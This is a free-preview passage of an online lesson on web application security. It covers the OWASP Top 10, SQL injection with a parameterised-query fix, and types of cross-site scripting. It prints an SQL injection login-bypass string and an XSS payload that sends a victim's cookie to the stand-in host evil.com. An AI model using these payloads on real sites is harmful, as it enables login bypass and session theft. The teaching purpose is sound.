You are viewing a free preview of this lesson.
Subscribe to unlock all 10 lessons in this course and every other course on LearningBro.
Application security (AppSec) focuses on finding, fixing, and preventing security vulnerabilities in software. With web applications being the primary target for attackers, understanding common vulnerabilities and secure coding practices is essential.
The OWASP Top 10 is the most widely referenced list of critical web application security risks:
| # | Risk | Description |
|---|---|---|
| A01 | Broken Access Control | Users can act outside their intended permissions |
| A02 | Cryptographic Failures | Sensitive data exposed due to weak or missing encryption |
| A03 | Injection | Untrusted data sent to an interpreter (SQL, NoSQL, OS, LDAP) |
| A04 | Insecure Design | Missing security controls in the design phase |
| A05 | Security Misconfiguration | Default credentials, open cloud storage, verbose errors |
| A06 | Vulnerable and Outdated Components | Using libraries with known vulnerabilities |
| A07 | Identification and Authentication Failures | Weak authentication, session management flaws |
| A08 | Software and Data Integrity Failures | Insecure CI/CD pipelines, unsigned updates |
| A09 | Security Logging and Monitoring Failures | Insufficient logging, no alerting on suspicious activity |
| A10 | Server-Side Request Forgery (SSRF) | Application fetches URLs controlled by the attacker |
SQL injection occurs when user input is inserted directly into a SQL query:
# DANGEROUS — never do this
query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
An attacker enters: admin' OR '1'='1' --
This becomes:
SELECT * FROM users WHERE username = 'admin' OR '1'='1' --' AND password = ''
# SAFE — use parameterised queries
cursor.execute(
"SELECT * FROM users WHERE username = %s AND password = %s",
(username, password)
)
| Defence | Description |
|---|---|
| Parameterised queries | Separate SQL code from data |
| ORM | Use an Object-Relational Mapper (e.g., Prisma, SQLAlchemy) |
| Input validation | Validate and sanitise all user input |
| Least privilege DB accounts | Application DB user should only have required permissions |
| WAF rules | Block common SQL injection patterns |
XSS injects malicious scripts into web pages viewed by other users:
| Type | Description |
|---|---|
| Stored XSS | Script is stored on the server (e.g., in a database) and served to users |
| Reflected XSS | Script is reflected from a URL parameter in the response |
| DOM-based XSS | Script is executed through client-side JavaScript manipulation |
<!-- Vulnerable: rendering user input directly -->
<p>Welcome, {{ user.name }}</p>
<!-- If user.name = <script>document.location='https://evil.com/steal?c='+document.cookie</script> -->
Subscribe to continue reading
Get full access to this lesson and all 10 lessons in this course.